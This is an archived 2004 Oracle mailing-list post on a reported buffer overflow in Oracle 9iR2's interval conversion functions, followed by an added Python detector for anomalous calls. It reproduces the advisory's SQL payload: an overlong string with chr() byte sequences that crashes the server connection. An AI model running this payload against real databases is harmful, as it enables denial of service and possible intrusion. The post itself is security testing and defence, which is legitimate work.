From: Pete Finnigan
To: oracle-l@freelists.org
Date: Thu, 26 Feb 2004 20:42:44 +0000
Subject: Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

Hi Jared,

I heard about this issue in early Feb. This guy Cesar Cerrudo posted a message to vulnwatch about these two vulnerabilities and also said he had a lot more. I saw a post on Bugtraq yesterday where someone was asking for the patch info.

It is not clear if an Oracle fix matches this bug or not and which patch applies. There is no advisory. Here is the header info from vulnwatch from his post. I have the full email sent to vulnwatch, which is similar to Jared's version on securiteam but is longer (no extra technical details, mostly rants).

    From: Cesar [mailto:cesarc56@yahoo.com]
    Sent: Thu 2004-02-05 3:15 PM
    To: vulnwatch@vulnwatch.org
    Cc:
    Subject: [VulnWatch] Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

    Security Advisory
    Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow.
    System Affected : Oracle Database 9ir2, previous versions could be affected too.
    Severity : High
    Remote exploitable : Yes
    Author: Cesar Cerrudo.
    Date: 02/05/04
    Advisory Number: CC020401

Anyway I have run the following test based on what he said in his advisory:

    SQL> edit
    Wrote file afiedt.buf

      1  SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
      2  || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)|
      3  ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)|
      4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
    SQL> /
    ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
    *
    ERROR at line 4:
    ORA-03113: end-of-file on communication channel

    SQL> select sysdate from dual;
    select sysdate from dual
    *
    ERROR at line 1:
    ORA-03114: not connected to ORACLE

    SQL>
    SQL> connect system/manager@sans
    Connected.
    SQL> edit
    Wrote file afiedt.buf

      1  SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
      2  || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)|
      3  ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)|
      4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
    SQL> /
    SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    *
    ERROR at line 1:
    ORA-03113: end-of-file on communication channel

    SQL> select sysdate from dual;
    select sysdate from dual
    *
    ERROR at line 1:
    ORA-03114: not connected to ORACLE

    SQL>

So yes, both of these vulnerabilities will terminate the Oracle connection, so it's possible it could be exploited remotely. The file c:\Unbreakable.txt is not created though. I have not tried under a debugger to see if anything can be done with the 3113 error in terms of exploiting the stack. If this is a true buffer overflow exploit then he would need to pass some sort of shell code and manipulate the stack to run it. Maybe his chr(??) are some sort of shell code for it to be a buffer overflow and capture the machine. On the surface it doesn't seem to work though. SQL*Net trace didn't tell me much, and also an Oracle core is created in the cdump directory with the "ARE YOU SURE" text on the top of the stack. I ran this on XP 9ir2 personal edition.

Kind regards

Pete

-- 
Pete Finnigan
email: pete@petefinnigan.com
Web site: http://www.petefinnigan.com - Oracle security audit specialists
Book: Oracle security step-by-step Guide - see http://store.sans.org for details.
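The thread above turns on the fact that NUMTOYMINTERVAL and NUMTODSINTERVAL only ever take a short, fixed unit name as their second argument ('YEAR' or 'MONTH' for the first, 'DAY', 'HOUR', 'MINUTE' or 'SECOND' for the second), so a long or expression-built literal in that position is an anomaly worth alerting on in captured SQL (audit trail, SQL trace, application logs). The script below is an added example written for this archive page; it is not Pete Finnigan's or Oracle's code. It assumes plain SQL text as input and the sample statements it scans are constructed for the example.

```python
"""Flag calls to NUMTOYMINTERVAL / NUMTODSINTERVAL whose unit argument is not
one of Oracle's documented interval units.  Added example, not code from the
original post.  Input is assumed to be plain SQL text (one statement per item)."""
import re

# Documented unit arguments (Oracle SQL Reference; case-insensitive).
VALID_UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}

CALL_RE = re.compile(r"\b(NUMTO(?:YM|DS)INTERVAL)\s*\(", re.I)


def _extract_args(sql, open_paren):
    """Split the argument list of the call whose '(' is at sql[open_paren].
    Respects nested parentheses (e.g. chr(59)) and '...' string literals, so
    a comma inside a literal or a nested call does not split an argument.
    Returns (args, index_of_closing_paren) or (None, len(sql)) if unterminated."""
    depth, in_str, args, cur = 0, False, [], []
    i = open_paren
    while i < len(sql):
        ch = sql[i]
        if in_str:
            cur.append(ch)
            if ch == "'":
                if i + 1 < len(sql) and sql[i + 1] == "'":   # '' escapes a quote
                    cur.append("'")
                    i += 1
                else:
                    in_str = False
        elif ch == "'":
            in_str = True
            cur.append(ch)
        elif ch == "(":
            depth += 1
            if depth > 1:
                cur.append(ch)
        elif ch == ")":
            depth -= 1
            if depth == 0:
                args.append("".join(cur).strip())
                return args, i
            cur.append(ch)
        elif ch == "," and depth == 1:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    return None, i


def unit_literal(arg):
    """Return the contents of arg if it is a single plain 'string' literal,
    otherwise None (concatenations, chr() chains, bind variables, ...)."""
    m = re.fullmatch(r"'((?:[^']|'')*)'", arg.strip())
    return m.group(1).replace("''", "'") if m else None


def check_interval_calls(sql):
    """Return a list of (function, reason, excerpt) findings for one statement."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func = m.group(1).upper()
        args, _ = _extract_args(sql, m.end() - 1)
        if args is None or len(args) < 2:
            findings.append((func, "malformed call", sql[m.start():m.start() + 40]))
            continue
        unit = unit_literal(args[1])
        if unit is None:
            findings.append((func, "unit built from expression (non-literal)", args[1][:40]))
        elif unit.strip().upper() not in VALID_UNITS[func]:
            findings.append((func, "unit not in valid set or oversized (%d chars)" % len(unit), unit[:40]))
    return findings


def scan_statements(statements):
    """Scan a sequence of statements; return [(index, findings)] for hits only."""
    return [(i, f) for i, s in enumerate(statements) if (f := check_interval_calls(s))]


# Constructed sample input: two legitimate calls, two anomalous ones.
SAMPLE_SQL = [
    "SELECT NUMTOYMINTERVAL(1, 'MONTH') FROM dual",
    "select numtodsinterval(90, 'second') from dual",
    "SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBB' || chr(59)||chr(79)) FROM DUAL",
    "SELECT NUMTODSINTERVAL(1,'" + "A" * 60 + "') FROM DUAL",
]

if __name__ == "__main__":
    for idx, findings in scan_statements(SAMPLE_SQL):
        for func, reason, excerpt in findings:
            print("statement %d: %s: %s [%s]" % (idx, func, reason, excerpt))
```

The scanner only looks at the unit argument, so it raises nothing for ordinary application SQL and flags both the concatenated chr() form and an oversized literal; pair it with alerting on ORA-03113 in client logs and on new core files in the cdump directory, which are the two symptoms the post itself reports.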